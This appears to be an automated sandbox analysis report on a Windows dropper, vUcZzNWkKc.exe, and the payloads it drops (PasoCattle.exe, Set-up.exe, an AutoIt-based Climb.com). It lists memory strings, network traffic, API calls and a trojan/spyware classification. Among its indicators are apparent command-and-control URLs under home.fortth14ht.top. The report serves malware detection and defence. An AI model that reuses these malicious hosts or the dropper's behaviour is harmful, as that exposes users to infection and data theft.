        Source: global trafficHTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.22.1Date: Sat, 28 Dec 2024 08:33:40 GMTContent-Type: text/html; charset=utf-8Content-Length: 207Connection: closeData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
        Source: vUcZzNWkKc.exe, 00000000.00000002.1763459410.00000000072E4000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000002.00000002.1985722353.00000000012EB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.drString found in binary or memory: http://.css
        Source: vUcZzNWkKc.exe, 00000000.00000002.1763459410.00000000072E4000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000002.00000002.1985722353.00000000012EB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.drString found in binary or memory: http://.jpg
        Source: Climb.com, 0000000D.00000003.2213807089.0000000001491000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
        Source: Climb.com, 0000000D.00000003.2213807089.0000000001491000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
        Source: Climb.com, 0000000D.00000003.1924401119.000000000452C000.00000004.00000800.00020000.00000000.sdmp, Fingers.10.dr, Climb.com.3.drString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
        Source: vUcZzNWkKc.exe, 00000000.00000002.1763459410.0000000006565000.00000004.00000800.00020000.00000000.sdmp, PasoCattle.exe.0.drString found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
        Source: Climb.com, 0000000D.00000003.1924401119.000000000452C000.00000004.00000800.00020000.00000000.sdmp, Fingers.10.dr, Climb.com.3.drString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
        Source: vUcZzNWkKc.exe, 00000000.00000002.1763459410.0000000006565000.00000004.00000800.00020000.00000000.sdmp, PasoCattle.exe.0.drString found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0
        Source: Climb.com, 0000000D.00000003.1924401119.000000000452C000.00000004.00000800.00020000.00000000.sdmp, Fingers.10.dr, Climb.com.3.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
        Source: Climb.com, 0000000D.00000003.1924401119.000000000452C000.00000004.00000800.00020000.00000000.sdmp, Fingers.10.dr, Climb.com.3.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
        Source: Climb.com, 0000000D.00000003.1924401119.000000000452C000.00000004.00000800.00020000.00000000.sdmp, Fingers.10.dr, Climb.com.3.drString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
        Source: Climb.com, 0000000D.00000003.2213807089.0000000001491000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
        Source: vUcZzNWkKc.exe, 00000000.00000002.1763459410.0000000006565000.00000004.00000800.00020000.00000000.sdmp, PasoCattle.exe.0.drString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
        Source: Climb.com, 0000000D.00000003.2213807089.0000000001491000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
        Source: Climb.com, 0000000D.00000003.2213807089.0000000001491000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
        Source: Climb.com, 0000000D.00000003.2213807089.0000000001491000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
        Source: Climb.com, 0000000D.00000003.2213807089.0000000001491000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
        Source: vUcZzNWkKc.exe, 00000000.00000002.1763459410.0000000006565000.00000004.00000800.00020000.00000000.sdmp, PasoCattle.exe.0.drString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
        Source: Set-up.exe, Set-up.exe, 00000002.00000003.1984043815.00000000008D2000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000002.00000002.1985183549.00000000008D2000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000002.00000003.1983744365.00000000008D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fortth14ht.top/nTrm
        Source: Set-up.exe.0.drString found in binary or memory: http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP13
        Source: Set-up.exe, Set-up.exe, 00000002.00000003.1984043815.00000000008D2000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000002.00000002.1985183549.00000000008D2000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000002.00000002.1985706274.00000000012E9000.00000004.00000001.01000000.00000008.sdmp, Set-up.exe, 00000002.00000003.1983744365.00000000008D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003
        Source: Set-up.exe, 00000002.00000003.1983744365.00000000008D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP173521000335a1
        Source: Set-up.exe, Set-up.exe, 00000002.00000003.1984043815.00000000008D2000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000002.00000002.1985183549.00000000008D2000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000002.00000003.1983744365.00000000008D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003?argument=0
        Source: Set-up.exe, 00000002.00000002.1985706274.00000000012E9000.00000004.00000001.01000000.00000008.sdmpString found in binary or memory: http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003http://home.fortth14ht.top/nTrmoVgOaovBJpKS
        Source: Set-up.exe, 00000002.00000003.1984043815.00000000008D2000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000002.00000002.1985183549.00000000008D2000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000002.00000003.1983744365.00000000008D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fortth14ht.top/nTrms
        Source: vUcZzNWkKc.exe, 00000000.00000002.1763459410.00000000072E4000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000002.00000002.1985722353.00000000012EB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.drString found in binary or memory: http://html4/loose.dtd
        Source: vUcZzNWkKc.exe, 00000000.00000002.1763459410.0000000006565000.00000004.00000800.00020000.00000000.sdmp, PasoCattle.exe, 00000001.00000002.1719617822.0000000000409000.00000002.00000001.01000000.00000007.sdmp, PasoCattle.exe, 00000001.00000000.1712224288.0000000000409000.00000002.00000001.01000000.00000007.sdmp, PasoCattle.exe.0.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
        Source: Climb.com, 0000000D.00000003.2213807089.0000000001491000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
        Source: Climb.com, 0000000D.00000003.1924401119.000000000452C000.00000004.00000800.00020000.00000000.sdmp, Fingers.10.dr, Climb.com.3.drString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
        Source: vUcZzNWkKc.exe, 00000000.00000002.1763459410.0000000006565000.00000004.00000800.00020000.00000000.sdmp, PasoCattle.exe.0.drString found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
        Source: vUcZzNWkKc.exe, 00000000.00000002.1763459410.0000000006565000.00000004.00000800.00020000.00000000.sdmp, PasoCattle.exe.0.drString found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
        Source: Climb.com, 0000000D.00000003.2213807089.0000000001491000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
        Source: vUcZzNWkKc.exe, 00000000.00000002.1763459410.0000000006565000.00000004.00000800.00020000.00000000.sdmp, PasoCattle.exe.0.drString found in binary or memory: http://ocsp.sectigo.com0
        Source: Climb.com, 0000000D.00000003.1924401119.000000000452C000.00000004.00000800.00020000.00000000.sdmp, Fingers.10.dr, Climb.com.3.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
        Source: Climb.com, 0000000D.00000003.1924401119.000000000452C000.00000004.00000800.00020000.00000000.sdmp, Fingers.10.dr, Climb.com.3.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
        Source: Climb.com, 0000000D.00000003.1924401119.000000000452C000.00000004.00000800.00020000.00000000.sdmp, Fingers.10.dr, Climb.com.3.drString found in binary or memory: http://ocsp2.globalsign.com/rootr606
        Source: vUcZzNWkKc.exe, 00000000.00000002.1763459410.0000000006565000.00000004.00000800.00020000.00000000.sdmp, PasoCattle.exe.0.drString found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
        Source: Climb.com, 0000000D.00000003.1924401119.000000000452C000.00000004.00000800.00020000.00000000.sdmp, Fingers.10.dr, Climb.com.3.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
        Source: vUcZzNWkKc.exe, 00000000.00000002.1763459410.0000000006565000.00000004.00000800.00020000.00000000.sdmp, PasoCattle.exe.0.drString found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
        Source: Climb.com, 0000000D.00000003.1924401119.000000000452C000.00000004.00000800.00020000.00000000.sdmp, Fingers.10.dr, Climb.com.3.drString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
        Source: vUcZzNWkKc.exe, 00000000.00000002.1763459410.0000000007429000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe.0.drString found in binary or memory: http://timestamp.digicert.com0
        Source: Climb.com, 0000000D.00000000.1778645855.0000000000AF5000.00000002.00000001.01000000.0000000A.sdmp, Climb.com, 0000000D.00000003.1924401119.000000000452C000.00000004.00000800.00020000.00000000.sdmp, Fingers.10.dr, Climb.com.3.drString found in binary or memory: http://www.autoitscript.com/autoit3/X
        Source: Climb.com, 0000000D.00000003.2213807089.0000000001491000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
        Source: Climb.com, 0000000D.00000003.2213807089.0000000001491000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
        Source: Climb.com, 0000000D.00000003.2167197496.0000000003C90000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000D.00000003.2167074960.0000000003DBA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
        Source: Climb.com, 0000000D.00000003.2216406997.0000000003C7C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
        Source: Climb.com, 0000000D.00000003.2216406997.0000000003C7C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
        Source: Climb.com, 0000000D.00000003.2167197496.0000000003C90000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000D.00000003.2167074960.0000000003DBA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
        Source: Climb.com, 0000000D.00000003.2167197496.0000000003C90000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000D.00000003.2167074960.0000000003DBA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
        Source: Climb.com, 0000000D.00000003.2167197496.0000000003C90000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000D.00000003.2167074960.0000000003DBA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
        Source: Climb.com, 0000000D.00000003.2216406997.0000000003C7C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
        Source: Climb.com, 0000000D.00000003.2216406997.0000000003C7C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
        Source: Set-up.exe.0.drString found in binary or memory: https://curl.se/docs/alt-svc.html
        Source: Set-up.exe.0.drString found in binary or memory: https://curl.se/docs/hsts.html
        Source: vUcZzNWkKc.exe, 00000000.00000002.1763459410.00000000072E4000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000002.00000002.1985722353.00000000012EB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.drString found in binary or memory: https://curl.se/docs/http-cookies.html
        Source: Climb.com, 0000000D.00000003.2167197496.0000000003C90000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000D.00000003.2167074960.0000000003DBA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
        Source: Climb.com, 0000000D.00000003.2167197496.0000000003C90000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000D.00000003.2167074960.0000000003DBA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
        Source: Climb.com, 0000000D.00000003.2167197496.0000000003C90000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000D.00000003.2167074960.0000000003DBA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
        Source: vUcZzNWkKc.exe, 00000000.00000002.1763459410.00000000072E4000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, Set-up.exe, 00000002.00000002.1985722353.00000000012EB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.drString found in binary or memory: https://httpbin.org/ip
        Source: vUcZzNWkKc.exe, 00000000.00000002.1763459410.00000000072E4000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000002.00000002.1985722353.00000000012EB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.drString found in binary or memory: https://httpbin.org/ipbefore
        Source: Climb.com, 0000000D.00000003.2216406997.0000000003C7C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
        Source: vUcZzNWkKc.exe, 00000000.00000002.1763459410.0000000006565000.00000004.00000800.00020000.00000000.sdmp, PasoCattle.exe.0.drString found in binary or memory: https://sectigo.com/CPS0
        Source: Climb.com, 0000000D.00000003.2167509243.0000000003DBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.microsof
        Source: Climb.com, 0000000D.00000003.2214922982.0000000005A57000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
        Source: Climb.com, 0000000D.00000003.2214922982.0000000005A57000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
        Source: Climb.com, 0000000D.00000003.2167581088.00000000014AA000.00000004.00000020.00020000.00000000.sdmp, Climb.com, 0000000D.00000003.2167509243.0000000003DBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
        Source: Climb.com, 0000000D.00000003.2167581088.0000000001485000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
        Source: Climb.com, 0000000D.00000003.2167581088.00000000014AA000.00000004.00000020.00020000.00000000.sdmp, Climb.com, 0000000D.00000003.2167509243.0000000003DBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
        Source: Climb.com, 0000000D.00000003.2167581088.0000000001485000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
        Source: Climb.com, 0000000D.00000003.2239939802.0000000003C79000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag
        Source: Climb.com, 0000000D.00000003.1924401119.000000000452C000.00000004.00000800.00020000.00000000.sdmp, Fingers.10.dr, Climb.com.3.drString found in binary or memory: https://www.autoitscript.com/autoit3/
        Source: Climb.com, 0000000D.00000003.2167197496.0000000003C90000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000D.00000003.2167074960.0000000003DBA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
        Source: Climb.com, 0000000D.00000003.2216406997.0000000003C7C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
        Source: Climb.com.3.dr, PasoCattle.exe.0.drString found in binary or memory: https://www.globalsign.com/repository/0
        Source: Climb.com, 0000000D.00000003.2167197496.0000000003C90000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000D.00000003.2167074960.0000000003DBA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
        Source: Climb.com, 0000000D.00000003.2214922982.0000000005A57000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
        Source: Climb.com, 0000000D.00000003.2214922982.0000000005A57000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
        Source: Climb.com, 0000000D.00000003.2214922982.0000000005A57000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
        Source: Climb.com, 0000000D.00000003.2214922982.0000000005A57000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
        Source: Climb.com, 0000000D.00000003.2214922982.0000000005A57000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
        Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
        Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
        Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
        Source: unknownHTTPS traffic detected: 172.67.128.184:443 -> 192.168.2.4:49737 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.67.128.184:443 -> 192.168.2.4:49741 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.67.128.184:443 -> 192.168.2.4:49742 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.67.128.184:443 -> 192.168.2.4:49743 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.67.128.184:443 -> 192.168.2.4:49744 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.67.128.184:443 -> 192.168.2.4:49745 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.67.128.184:443 -> 192.168.2.4:49747 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.67.128.184:443 -> 192.168.2.4:49754 version: TLS 1.2
        Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeCode function: 1_2_004050F9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,1_2_004050F9
        Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeCode function: 1_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,1_2_004044D1

        System Summary

        barindex
        Source: 0.2.vUcZzNWkKc.exe.610000.0.unpack, type: UNPACKEDPEMatched rule: Detects downloader / injector Author: ditekSHen
        Source: vUcZzNWkKc.exeStatic PE information: section name:
        Source: vUcZzNWkKc.exeStatic PE information: section name: .idata
        Source: vUcZzNWkKc.exeStatic PE information: section name:
        Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeCode function: 1_2_004038AF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,InitOnceBeginInitialize,ExitWindowsEx,1_2_004038AF
        Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeFile created: C:\Windows\UtilitySoccerJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeFile created: C:\Windows\MoveRefurbishedJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeFile created: C:\Windows\ClarkWriterJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeCode function: 1_2_0040737E1_2_0040737E
        Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeCode function: 1_2_00406EFE1_2_00406EFE
        Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeCode function: 1_2_004079A21_2_004079A2
        Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeCode function: 1_2_004049A81_2_004049A8
        Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 2_3_008DDE632_3_008DDE63
        Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 2_3_008DDE632_3_008DDE63
        Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 2_3_008DDE632_3_008DDE63
        Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 2_3_008DDE632_3_008DDE63
        Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 2_3_008DDE632_3_008DDE63
        Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 2_3_008DDE632_3_008DDE63
        Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 2_3_008DDE632_3_008DDE63
        Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 2_3_008DDE632_3_008DDE63
        Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 2_3_008DDE632_3_008DDE63
        Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 2_3_008DDE632_3_008DDE63
        Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 2_3_008DDE632_3_008DDE63
        Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 2_3_008DDE632_3_008DDE63
        Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 2_3_008DDE632_3_008DDE63
        Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 2_3_008DDE632_3_008DDE63
        Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 2_3_008DDE632_3_008DDE63
        Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 2_3_008DDE632_3_008DDE63
        Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\768400\Climb.com 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
        Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeCode function: String function: 004062CF appears 57 times
        Source: vUcZzNWkKc.exe, 00000000.00000002.1747857087.0000000000DA2000.00000004.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameladdad.exe4 vs vUcZzNWkKc.exe
        Source: vUcZzNWkKc.exe, 00000000.00000002.1754161112.00000000050A0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameladdad.exe4 vs vUcZzNWkKc.exe
        Source: vUcZzNWkKc.exeBinary or memory string: OriginalFilenameladdad.exe4 vs vUcZzNWkKc.exe
        Source: vUcZzNWkKc.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
        Source: 0.2.vUcZzNWkKc.exe.610000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLInjector04 author = ditekSHen, description = Detects downloader / injector
        Source: vUcZzNWkKc.exeStatic PE information: Section: ycplgdyn ZLIB complexity 0.9944026649228258
        Source: Set-up.exe.0.drBinary string: Lntdll.dllNtCreateFileNtDeviceIoControlFileNtCancelIoFileEx\Device\Afd
        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@28/23@10/3
        Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeCode function: 1_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,1_2_004044D1
        Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeCode function: 1_2_004024FB CoCreateInstance,1_2_004024FB
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\vUcZzNWkKc.exe.logJump to behavior
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeMutant created: NULL
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7760:120:WilError_03
        Source: C:\Users\user\AppData\Local\Temp\Set-up.exeMutant created: \Sessions\1\BaseNamedObjects\My_mutex
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeFile created: C:\Users\user\AppData\Local\Temp\PasoCattle.exeJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
        Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Set-up.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
